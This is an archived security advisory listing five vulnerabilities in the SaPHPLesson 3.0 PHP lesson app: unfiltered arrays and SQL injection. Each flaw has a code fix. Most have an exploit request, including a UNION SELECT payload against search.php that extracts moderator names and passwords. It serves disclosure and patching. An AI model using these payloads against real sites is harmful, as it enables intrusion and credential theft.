TUCoPS :: Web :: Apps :: b06-2032.htm

SaPHPLesson 3.0 Multbugs
SaPHPLesson 3.0 Multbugs
SaPHPLesson 3.0 Multbugs


SaPHPLesson 3.0 Multbugs By :-- D3vil-0x1 | Devil-00 --:=0D
=0D
	1- Unfilter array=0D
=0D
    	Filename	:- show.php=0D
        Line		:- 102=0D
=0D
[code]=0D
$hrow[] = $Row2;[/code]=0D
=0D
Fix :-=0D
=0D
Add To Line [ 11 ] /show.php This Code :-=0D
=0D
	we add the code to global to fix all unfilter ver. at the code :)=0D
=0D
[code]=0D
$hrow = array();[/code]=0D
=0D
Exploit :-=0D
=0D
	GET ^=0D
		/lessons/show.php?lessid=1&hrow=D3vil-0x1=0D
=0D
/---------------------------------------------------------/=0D
=0D
	2- Unfilter array=0D
=0D
    	Filename	:- showcat.php=0D
        Line		:- 80=0D
=0D
[code]=0D
$Lsnrow[] = $Row;[/code]=0D
=0D
Fix :-=0D
=0D
Add To Line [ 11 ] /showcat.php This Code :-=0D
=0D
	we add the code to global to fix all unfilter ver. at the code :)=0D
=0D
[code]=0D
$Lsnrow = array();[/code]=0D
=0D
Exploit :-=0D
=0D
	GET ^=0D
=0D
    	/lessons/showcat.php?forumid=1&Lsnrow=D3vil-0x1=0D
=0D
/---------------------------------------------------------/=0D
=0D
	3- SQL Injection=0D
=0D
    	Filename	:- search.php=0D
        Line		:- MultLines=0D
=0D
Fix :-=0D
=0D
	Line 28 Replace It With=0D
=0D
[code]=0D
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.".addslashes($Find)." REGEXP'$Word' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]=0D
=0D
	Line 32 Replace It With=0D
=0D
[code]=0D
$Sql = "select * from less,forums where less.Hidden!=1 and BINARY less.$Find REGEXP'%$Word%' and less.forumno='".addslashes($Cat)."' and forums.id=less.forumno order by ".addslashes($Order)." ".addslashes($Trteb)."";[/code]=0D
=0D
	Exploit :-=0D
=0D
    	POST ^=0D
=0D
    	Word=a&Find=lesstitle UNION ALL SELECT null,null,null,ModName,null,null,null,null,ModPassword,null,null,null,null,null,null,null,null,null,null,null FROM modretor/*&Cat=All&Order=lessid&Trteb=DESC=0D
=0D
/---------------------------------------------------------/=0D
=0D
	4- SQL Injection=0D
=0D
    	Filename	:- misc.php=0D
        Line		:- 64=0D
=0D
Fix :-=0D
	Replace Line 62 & 63 With This Code=0D
=0D
[code]=0D
$LID  = intval($_GET["LID"]);=0D
$Rate = intval($_POST["Rate"]);[/code]=0D
=0D
/---------------------------------------------------------/=0D
=0D
	5- Unfilter array=0D
=0D
    	Filename	:- index.php=0D
        Line		:- 24=0D
=0D
[code]=0D
$rows[] = $Row;[/code]=0D
=0D
Fix :-=0D
=0D
Add To Line [ 11 ] /index.php This Code :-=0D
=0D
	we add the code to global to fix all unfilter ver. at the code :)=0D
=0D
[code]=0D
$rows = array();=0D
$hrow = array();[/code]=0D
=0D
Exploit :-=0D
=0D
	GET ^=0D
=0D
    	/saphplesson/index.php?rows=D3vil-x01

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH